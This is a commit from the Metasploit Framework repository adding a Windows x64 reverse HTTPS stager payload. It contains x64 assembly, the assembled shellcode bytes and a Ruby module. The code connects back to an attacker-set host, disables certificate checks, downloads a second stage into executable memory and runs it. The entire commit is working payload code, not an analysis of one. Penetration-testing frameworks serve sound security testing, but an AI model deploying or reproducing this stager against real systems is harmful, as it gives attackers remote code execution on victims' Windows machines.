Land #1821, x64_reverse_https payload

unstable
Tod Beardsley 2013-05-30 16:09:33 -05:00
commit dc014ede36
4 changed files with 279 additions and 0 deletions

Binary file not shown.

View File

@ -0,0 +1,158 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Rewrited to x64 by agix
; Compatible: Windows 7
; Architecture: x64
;-----------------------------------------------------------------------------;
[BITS 64]
; Input: RBP must be the address of 'api_call'.
; Output: RDI will be the socket for the connection to the server
; Clobbers: RAX, RCX, RDX, RDI, R8, R9, R10, R12, R13, R14, R15
load_wininet:
; setup the structures we need on the stack...
mov r14, 'wininet'
push r14 ; Push the bytes 'wininet',0 onto the stack.
mov r14, rsp ; save pointer to the "wininet" string for LoadLibraryA call.
mov rcx, r14 ; set the param for the library to load
mov r10, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call rbp ; LoadLibraryA( "ws2_32" )
internetopen:
push byte 0 ; NULL pointer
mov rcx, rsp ; LPCTSTR lpszAgent ("\x00")
xor rdx, rdx ; DWORD dwAccessType (PRECONFIG = 0)
xor r8, r8 ; LPCTSTR lpszProxyName
xor r9, r9 ; LPCTSTR lpszProxyBypass
push r8 ; DWORD dwFlags
push r8 ; alignment
mov r10, 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call rbp
jmp dbl_get_server_host
internetconnect:
pop rdx ; LPCTSTR lpszServerName
mov rcx, rax ; HINTERNET hInternet
mov r8, 4444 ; PORT
xor r9, r9 ; LPCTSTR lpszUsername
push r9 ; DWORD_PTR dwContext (NULL)
push r9 ; DWORD dwFlags
push 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
push r9 ; alignment
mov r10, 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call rbp
jmp get_server_uri
httpopenrequest:
mov rcx, rax ; HINTERNET hConnect
xor rdx, rdx ; LPCTSTR lpszVerb
pop r8 ; LPCTSTR lpszObjectName
xor r9, r9 ; LPCTSTR lpszVersion
push rdx ; DWORD_PTR dwContext
push qword (0x0000000080000000 | 0x0000000004000000 | 0x0000000000800000 | 0x0000000000200000 | 0x0000000000001000 |0x0000000000002000 |0x0000000000000200) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
;0x00000200 ; INTERNET_FLAG_NO_UI
push rdx ; LPCTSTR *lplpszAcceptTypes
push rdx ; LPCTSTR lpszReferer
mov r10, 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call rbp
mov rsi, rax
retry:
push byte 10
pop rdi
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
internetsetoption:
mov rcx, rsi ; HINTERNET hInternet
mov rdx, 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push qword 0x00003380
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
mov r8, rsp
mov r9, 4 ; sizeof(dwFlags)
mov r10, 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call rbp
httpsendrequest:
mov rcx, rsi ; HINTERNET hRequest
xor rdx, rdx ; LPCTSTR lpszHeaders
xor r8, r8 ; DWORD dwHeadersLength
xor r9, r9 ; LPVOID lpOptional
push rdx ; DWORD dwOptionalLength
mov r10, 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
call rbp
test eax,eax
jnz short allocate_memory
try_it_again:
dec rdi
jz failure
jmp short internetsetoption
dbl_get_server_host:
jmp get_server_host
get_server_uri:
call httpopenrequest
server_uri:
db "/12345", 0x00
failure:
mov r14, 0x56A2B5F0 ; hardcoded to exitprocess for size
call rbp
allocate_memory:
xor rcx, rcx ; LPVOID lpAddress
mov rdx, 0x00400000 ; SIZE_T dwSize
mov r8, 0x1000 ; DWORD flAllocationType(MEM_COMMIT)
mov r9, 0x40 ; DWORD flProtect(PAGE_EXECUTE_READWRITE)
mov r10, 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call rbp
download_prep:
xchg rax, rbx ; place the allocated base address in ebx
push rbx ; store a copy of the stage base address on the stack
push rbx ; temporary storage for bytes read count
mov rdi, rsp ; &bytesRead
download_more:
mov rcx, rsi ; HINTERNET hFile
mov rdx, rbx ; LPVOID lpBuffer
mov r8, 8192 ; DWORD dwNumberOfBytesToRead
mov r9, rdi ; LPDWORD lpdwNumberOfBytesRead
mov r10, 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
call rbp
add rsp, 32 ; clean reserverd space
test eax,eax ; download failed? (optional?)
jz failure
mov rax, [rdi]
add rbx, rax ; buffer += bytes_received
test rax,rax ; optional?
jnz download_more ; continue until it returns 0
pop rax ; clear the temporary storage
pop rax ; f*cking alignment
execute_stage:
ret ; dive into the stored stage address
get_server_host:
call internetconnect
server_host:

View File

@ -0,0 +1,20 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Rewrited to x64 by agix
; Compatible: Windows 7
; Architecture: x64
; Size: 570 bytes
; Build: >build.py stager_reverse_https
;-----------------------------------------------------------------------------;
[BITS 64]
[ORG 0]
cld ; Clear the direction flag.
and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop rbp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_https.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket

View File

@ -0,0 +1,101 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/reverse_https'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Windows
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows x64 Reverse HTTPS Stager',
'Description' => 'Tunnel communication over HTTP using SSL (Windows x64)',
'Author' => 'hdm (x64 rewrite by agix)',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'Handler' => Msf::Handler::ReverseHttps,
'Convention' => 'sockrdi https',
'Stager' =>
{
'Offsets' =>
{
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
# 'EXITFUNC' => [ 290, 'V' ],
'LPORT' => [ 282, 'v' ], # Not a typo, really little endian
},
'Payload' =>
"\xFC\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
"\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
"\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
"\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x66\x81\x78" +
"\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67" +
"\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56" +
"\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0" +
"\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24" +
"\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41" +
"\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01" +
"\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83" +
"\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF" +
"\xFF\xFF\x5D\x49\xBE\x77\x69\x6E\x69\x6E\x65\x74\x00\x41\x56\x49" +
"\x89\xE6\x4C\x89\xF1\x49\xBA\x4C\x77\x26\x07\x00\x00\x00\x00\xFF" +
"\xD5\x6A\x00\x48\x89\xE1\x48\x31\xD2\x4D\x31\xC0\x4D\x31\xC9\x41" +
"\x50\x41\x50\x49\xBA\x3A\x56\x79\xA7\x00\x00\x00\x00\xFF\xD5\xE9" +
"\x9B\x00\x00\x00\x5A\x48\x89\xC1\x49\xB8\x5C\x11\x00\x00\x00\x00" +
"\x00\x00\x4D\x31\xC9\x41\x51\x41\x51\x6A\x03\x41\x51\x49\xBA\x57" +
"\x89\x9F\xC6\x00\x00\x00\x00\xFF\xD5\xEB\x79\x48\x89\xC1\x48\x31" +
"\xD2\x41\x58\x4D\x31\xC9\x52\x68\x00\x32\xA0\x84\x52\x52\x49\xBA" +
"\xEB\x55\x2E\x3B\x00\x00\x00\x00\xFF\xD5\x48\x89\xC6\x6A\x0A\x5F" +
"\x48\x89\xF1\x48\xBA\x1F\x00\x00\x00\x00\x00\x00\x00\x68\x80\x33" +
"\x00\x00\x49\x89\xE0\x49\xB9\x04\x00\x00\x00\x00\x00\x00\x00\x49" +
"\xBA\x75\x46\x9E\x86\x00\x00\x00\x00\xFF\xD5\x48\x89\xF1\x48\x31" +
"\xD2\x4D\x31\xC0\x4D\x31\xC9\x52\x49\xBA\x2D\x06\x18\x7B\x00\x00" +
"\x00\x00\xFF\xD5\x85\xC0\x75\x24\x48\xFF\xCF\x74\x13\xEB\xB1\xE9" +
"\x81\x00\x00\x00\xE8\x82\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00" +
"\x49\xBE\xF0\xB5\xA2\x56\x00\x00\x00\x00\xFF\xD5\x48\x31\xC9\x48" +
"\xBA\x00\x00\x40\x00\x00\x00\x00\x00\x49\xB8\x00\x10\x00\x00\x00" +
"\x00\x00\x00\x49\xB9\x40\x00\x00\x00\x00\x00\x00\x00\x49\xBA\x58" +
"\xA4\x53\xE5\x00\x00\x00\x00\xFF\xD5\x48\x93\x53\x53\x48\x89\xE7" +
"\x48\x89\xF1\x48\x89\xDA\x49\xB8\x00\x20\x00\x00\x00\x00\x00\x00" +
"\x49\x89\xF9\x49\xBA\x12\x96\x89\xE2\x00\x00\x00\x00\xFF\xD5\x48" +
"\x83\xC4\x20\x85\xC0\x74\x99\x48\x8B\x07\x48\x01\xC3\x48\x85\xC0" +
"\x75\xCE\x58\x58\xC3\xE8\xDA\xFE\xFF\xFF"
}
))
end
#
# Do not transmit the stage over the connection. We handle this via HTTPS
#
def stage_over_connection?
false
end
#
# Generate the first stage
#
def generate
p = super
i = p.index("/12345\x00")
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
p[i, u.length] = u
p + datastore['LHOST'].to_s + "\x00"
end
#
# Always wait at least 20 seconds for this payload (due to staging delays)
#
def wfs_delay
20
end
end